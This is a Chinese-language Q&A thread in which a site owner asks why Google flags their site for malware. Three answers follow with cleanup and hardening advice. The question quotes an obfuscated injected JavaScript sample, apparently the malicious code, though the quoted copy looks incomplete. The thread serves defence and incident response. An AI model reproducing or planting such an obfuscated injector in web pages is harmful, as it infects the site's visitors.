根据谷歌网站上的恶意软件，但我找不到它

Question

昨天，当我访问我的一个网站时，我收到了来自谷歌的警告，说我的网站上有恶意软件。我查看了代码，确实有一些不应该存在的 javascript。我用谷歌搜索并没有发现任何有用的东西。当我回到我的网站时，该代码已经消失了，但 google（当从搜索引擎访问该网站时）和 google chrome 仍然给我一个警告，指出我的网站上有恶意软件。

我查看了网站管理员工具，他们发现很少有网页存在问题。其中之一是http://www.keramikfliesen.com/schweiz/rimini/。 Malware 下的站长工具中列出的代码是：

<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~

你能帮帮我吗？我该如何应对？

非常感谢大家提前提供的帮助！

Answer 1

• 从您的网页中删除恶意软件。
• 立即更改您的密码。
• 还要检查任何 XSS（跨站点脚本）和 SQL injection 漏洞。
• 停用排名不高或来自知名来源的插件。
• 使用安全协议。查看 StopBadware.org 的 Tips for Cleaning and Securing Your Website。
• 留意您的日志文件。
• 及时了解最新的软件更新和补丁。
  
  希望对您有所帮助！

Answer 2

如果代码再次出现，则攻击者留下了一些脚本，该脚本应请求运行感染程序。通常，此脚本会接收到恶意代码的编码字符串（例如在base64 中），对其进行解码并通过eval() 执行。您应该找到这个文件（它很可能是一个 PHP 脚本）并将其删除。要找到它，请查看日志并搜索可疑请求（例如，单个 POST 请求，传输 base64 字符串是非常可疑的请求）。

Answer 3

您的主机很可能已被自动化工具入侵（密码被盗）。 该工具通常会在 js 文件中注入一些 javascript，以便用恶意软件感染访问您页面的人。你应该：

1. 更改您的密码。
2. 恢复最近的非受损备份。